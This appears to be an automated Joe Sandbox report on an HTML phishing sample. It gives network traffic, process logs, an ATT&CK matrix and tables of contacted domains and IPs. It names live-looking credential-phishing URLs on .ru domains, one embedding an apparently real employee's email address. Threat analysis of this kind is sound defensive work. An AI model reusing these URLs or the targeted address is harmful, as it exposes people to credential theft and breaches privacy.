Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/2144205977:1734822664:XKpvCZGkBd0ktNxiYV1b9wSYFyh5ygqpTdMQDiGBsGo/8f5bc0d96a8b0caa/aBNtVQx31oocAJjdhBaOAt7LmiFGkA8t6ldYzHWiVng-1734824805-1.1.1.1-EKqX6.aLBQLg80.TuzSr5p4_QiC2m1xIs3JPNlgA6I7950_c5ao3YSbrBzt3ilxZ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3279sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: aBNtVQx31oocAJjdhBaOAt7LmiFGkA8t6ldYzHWiVng-1734824805-1.1.1.1-EKqX6.aLBQLg80.TuzSr5p4_QiC2m1xIs3JPNlgA6I7950_c5ao3YSbrBzt3ilxZsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6079b/0x4AAAAAAA0rlvr7sW4yFuOO/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 21 Dec 2024 23:46:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zf2cyPTcb770mHpOo8Ao4kqOpBNflpSWY8j173SOCajOnQ9psL5bIVwcPbiTPo45iui7FJV4U7KQZmJTV%2BSJzfoOMNAg%2ButsQmGrdz26ZLBUppNFse7gc3O68SlnyA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5570&min_rtt=5537&rtt_var=1623&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2230&delivery_rate=491882&cwnd=238&unsent_bytes=0&cid=19be6584d195fc0c&ts=157&x=0"CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 8f5bc0ea0b398c89-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1983&rtt_var=765&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1896&delivery_rate=1411309&cwnd=202&unsent_bytes=0&cid=159d0a7e7ea639cc&ts=9789&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 21 Dec 2024 23:46:51 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: SHh0a4KtzHl2gDw0LcsakF7jyLQZmEZDTJA=$Z7koWv5M1ZZOF2OeServer: cloudflareCF-RAY: 8f5bc101c8018c5f-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 21 Dec 2024 23:46:58 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: d1jnM9DZXtLup/m6Ift4kN5/KYi3eTb9Nns=$UZpY4EvXgOkjBUcrServer: cloudflareCF-RAY: 8f5bc12a38ec429a-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 21 Dec 2024 23:47:05 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: a1+9r2hDQ54jchE0vOgmACn4xQt/Vzt3YtA=$5HpocD3h80iQQrZ1Server: cloudflareCF-RAY: 8f5bc154eba919ae-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_103.2.dr, chromecache_118.2.drString found in binary or memory: http://github.com/requirejs/almond/LICENSE
Source: chromecache_108.2.drString found in binary or memory: http://schema.org/Organization
Source: chromecache_108.2.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: chromecache_108.2.drString found in binary or memory: https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.c
Source: chromecache_108.2.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: chromecache_97.2.dr, chromecache_101.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: chromecache_108.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: chromecache_108.2.drString found in binary or memory: https://onedrive.live.com/about/en-us/
Source: chromecache_108.2.drString found in binary or memory: https://outlook.live.com/owa/
Source: chromecache_108.2.drString found in binary or memory: https://products.office.com/en-us/home
Source: chromecache_108.2.drString found in binary or memory: https://products.office.com/en-us/microsoft-teams/free?icid=SSM_AS_Promo_Apps_MicrosoftTeams
Source: chromecache_108.2.drString found in binary or memory: https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
Source: chromecache_108.2.drString found in binary or memory: https://www.onenote.com/
Source: chromecache_108.2.drString found in binary or memory: https://www.skype.com/en/
Source: chromecache_108.2.drString found in binary or memory: https://www.xbox.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: classification engineClassification label: mal64.phis.evad.winHTML@29/51@42/13
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\7394231845.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2220,i,2674854293145745611,13744225234503133344,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2220,i,2674854293145745611,13744225234503133344,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://tf6.jqugbctcds.ru/0ph1/#F#Dhilbertcandelario.panagsagan@globalfoundries.comHTTP Parser: https://tf6.jqugbctcds.ru/0ph1/#F#Dhilbertcandelario.panagsagan@globalfoundries.com
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
Boot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://tf6.jqugbctcds.ru/0ph1/#F#Dhilbertcandelario.panagsagan@globalfoundries.com100%SlashNextCredential Stealing type: Phishing & Social Engineering
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    code.jquery.com
    151.101.2.137
    truefalse
      high
      2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ru
      172.67.181.220
      truefalse
        unknown
        cdnjs.cloudflare.com
        104.17.24.14
        truefalse
          high
          challenges.cloudflare.com
          104.18.94.41
          truefalse
            high
            www.google.com
            142.250.181.132
            truefalse
              high
              tf6.jqugbctcds.ru
              104.21.24.112
              truetrue
                unknown
                billottisorganzing.com
                69.49.245.172
                truefalse
                  unknown
                  c.s-microsoft.com
                  unknown
                  unknownfalse
                    high
                    www.sharepoint.com
                    unknown
                    unknownfalse
                      high
                      assets.onestore.ms
                      unknown
                      unknownfalse
                        high
                        ajax.aspnetcdn.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f5bc0d96a8b0caa&lang=autofalse
                            high
                            file:///C:/Users/user/Desktop/7394231845.htmltrue
                              unknown
                              https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/2144205977:1734822664:XKpvCZGkBd0ktNxiYV1b9wSYFyh5ygqpTdMQDiGBsGo/8f5bc0d96a8b0caa/aBNtVQx31oocAJjdhBaOAt7LmiFGkA8t6ldYzHWiVng-1734824805-1.1.1.1-EKqX6.aLBQLg80.TuzSr5p4_QiC2m1xIs3JPNlgA6I7950_c5ao3YSbrBzt3ilxZfalse
                                  high
                                  https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                    high
                                    https://billottisorganzing.com/res444.php?2-68747470733a2f2f5446362e6a7175676263746364732e72752f307068312f-yewwoodfalse
                                      unknown
                                      https://2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ru/13969733940135742186QBaVJJEPNDNHBZEJMKLGFKSODYUFRAXZJQPSJLVGPSOLEMMDQJNPZMCDfalse
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f5bc0d96a8b0caa/1734824809472/0068747f3768a1b24c413c2962aa9534744d0a8cc5fcb76f23f2c498ea18bb03/1-Bd7uYuoqxOXy_false
                                          high
                                          https://tf6.jqugbctcds.ru/0ph1/true
                                            unknown
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6079b/0x4AAAAAAA0rlvr7sW4yFuOO/auto/fbE/normal/auto/false
                                              high
                                              https://tf6.jqugbctcds.ru/0ph1/#F#Dhilbertcandelario.panagsagan@globalfoundries.comtrue
                                              • SlashNext: Credential Stealing type: Phishing & Social Engineering
                                              unknown
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                high
                                                https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                                                  high
                                                  https://tf6.jqugbctcds.ru/favicon.icofalse
                                                    unknown
                                                    https://a.nel.cloudflare.com/report/v4?s=zf2cyPTcb770mHpOo8Ao4kqOpBNflpSWY8j173SOCajOnQ9psL5bIVwcPbiTPo45iui7FJV4U7KQZmJTV%2BSJzfoOMNAg%2ButsQmGrdz26ZLBUppNFse7gc3O68SlnyA%3D%3Dfalse
                                                      high
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f5bc0d96a8b0caa/1734824809476/4QWAiHdGMOFBFnNfalse
                                                        high
                                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                                          high
                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://outlook.live.com/owa/chromecache_108.2.drfalse
                                                            high
                                                            https://www.skype.com/en/chromecache_108.2.drfalse
                                                              high
                                                              https://products.office.com/en-us/homechromecache_108.2.drfalse
                                                                high
                                                                https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.cchromecache_108.2.drfalse
                                                                  high
                                                                  https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jschromecache_108.2.drfalse
                                                                    high
                                                                    https://onedrive.live.com/about/en-us/chromecache_108.2.drfalse
                                                                      high
                                                                      https://products.office.com/en-us/microsoft-teams/free?icid=SSM_AS_Promo_Apps_MicrosoftTeamschromecache_108.2.drfalse
                                                                        high
                                                                        https://www.onenote.com/chromecache_108.2.drfalse
                                                                          high
                                                                          https://www.xbox.com/chromecache_108.2.drfalse
                                                                            high
                                                                            http://schema.org/Organizationchromecache_108.2.drfalse
                                                                              high
                                                                              http://github.com/requirejs/almond/LICENSEchromecache_103.2.dr, chromecache_118.2.drfalse
                                                                                high
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                104.18.94.41
                                                                                challenges.cloudflare.comUnited States
                                                                                13335CLOUDFLARENETUSfalse
                                                                                142.250.181.132
                                                                                www.google.comUnited States
                                                                                15169GOOGLEUSfalse
                                                                                172.67.181.220
                                                                                2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ruUnited States
                                                                                13335CLOUDFLARENETUSfalse
                                                                                104.21.24.112
                                                                                tf6.jqugbctcds.ruUnited States
                                                                                13335CLOUDFLARENETUStrue
                                                                                151.101.194.137
                                                                                unknownUnited States
                                                                                54113FASTLYUSfalse
                                                                                35.190.80.1
                                                                                a.nel.cloudflare.comUnited States
                                                                                15169GOOGLEUSfalse
                                                                                104.17.24.14
                                                                                cdnjs.cloudflare.comUnited States
                                                                                13335CLOUDFLARENETUSfalse
                                                                                69.49.245.172
                                                                                billottisorganzing.comUnited States
                                                                                46606UNIFIEDLAYER-AS-1USfalse
                                                                                104.18.95.41
                                                                                unknownUnited States
                                                                                13335CLOUDFLARENETUSfalse
                                                                                151.101.2.137
                                                                                code.jquery.comUnited States
                                                                                54113FASTLYUSfalse
                                                                                239.255.255.250
                                                                                unknownReserved
                                                                                unknownunknownfalse
                                                                                104.17.25.14
                                                                                unknownUnited States
                                                                                13335CLOUDFLARENETUSfalse
                                                                                IP
                                                                                192.168.2.4
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1579373
                                                                                Start date and time:2024-12-22 00:45:30 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 5m 37s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:defaultwindowshtmlcookbook.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:7
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:7394231845.html
                                                                                Detection:MAL
                                                                                Classification:mal64.phis.evad.winHTML@29/51@42/13
                                                                                EGA Information:Failed
                                                                                HCA Information:
                                                                                • Successful, ratio: 100%
                                                                                • Number of executed functions: 0
                                                                                • Number of non-executed functions: 0
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .html
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.19.206, 64.233.162.84, 142.250.181.142, 172.217.19.234, 142.250.181.74, 142.250.181.106, 142.250.181.138, 172.217.19.202, 172.217.19.10, 172.217.17.42, 172.217.17.74, 199.232.214.172, 192.229.221.95, 172.217.17.46, 20.76.201.171, 20.112.250.133, 20.236.44.162, 20.231.239.246, 20.70.246.20, 23.195.61.233, 152.199.19.160, 2.16.168.101, 2.16.168.105, 104.121.5.198, 2.16.168.114, 2.16.168.100, 184.30.17.142, 172.217.17.35, 23.218.208.109, 52.149.20.212, 13.107.246.63
                                                                                • Excluded domains from analysis (whitelisted): assets.onestore.ms.edgekey.net, slscr.update.microsoft.com, sharepoint.microsoft.com, e13678.dscb.akamaiedge.net, clientservices.googleapis.com, a1449.dscg2.akamai.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, www.microsoft.com-c-3.edgekey.net, clients2.google.com, mscomajax.vo.msecnd.net, ocsp.digicert.com, redirector.gvt1.com, update.googleapis.com, img-prod-cms-rt-microsoft-com.akamaized.net, a1778.g2.akamai.net, optimizationguide-pa.googleapis.com, e10583.dspg.akamaiedge.net, clients1.google.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, cs22.wpc.v0cdn.net, ctldl.windowsupdate.com, statics-marketingsites-wcus-ms-com.akamaized.net, assets.onestore.ms.akadns.net, fe3cr.delivery.mp.microsoft.com, c-s.cms.ms.akadns.net, edgedl.me.gvt1.com, c.s-microsoft.com-c.edgekey.net, e13678.dscg.akamaiedge.net, clients.l.google.com, az725175.vo.msecnd.net, www.microsoft.com
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                No simulations
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                104.17.24.14Proforma.Invoice.Payment.$$.htmlGet hashmaliciousUnknownBrowse
                                                                                • cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
                                                                                http://vtaurl.comGet hashmaliciousUnknownBrowse
                                                                                • cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
                                                                                http://Voyages.CNTraveler.comGet hashmaliciousUnknownBrowse
                                                                                • cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
                                                                                172.67.181.220Non-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
                                                                                  EFT Remittance_(Deerequipment)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                                    https://www.google.com.hk/url?q=KWUZMS42J831JSWOSF4KEIP36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fjvsimmigration.com/c/efcfa9e5f8b2f41713ea899643a31954/YnJ1Y2VwQGxlc21hbi5jb20=Get hashmaliciousUnknownBrowse
                                                                                      104.18.94.41https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/Get hashmaliciousUnknownBrowse
                                                                                        YearEnd_Benefit_Bonus_Payout__Details__ChasChas.htmlGet hashmaliciousUnknownBrowse
                                                                                          https://contractorssteelform1flows.powerappsportals.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                            https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/Get hashmaliciousHTMLPhisherBrowse
                                                                                              http://northwesthousingservices.discussripped.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                https://account.book-ver.oneGet hashmaliciousUnknownBrowse
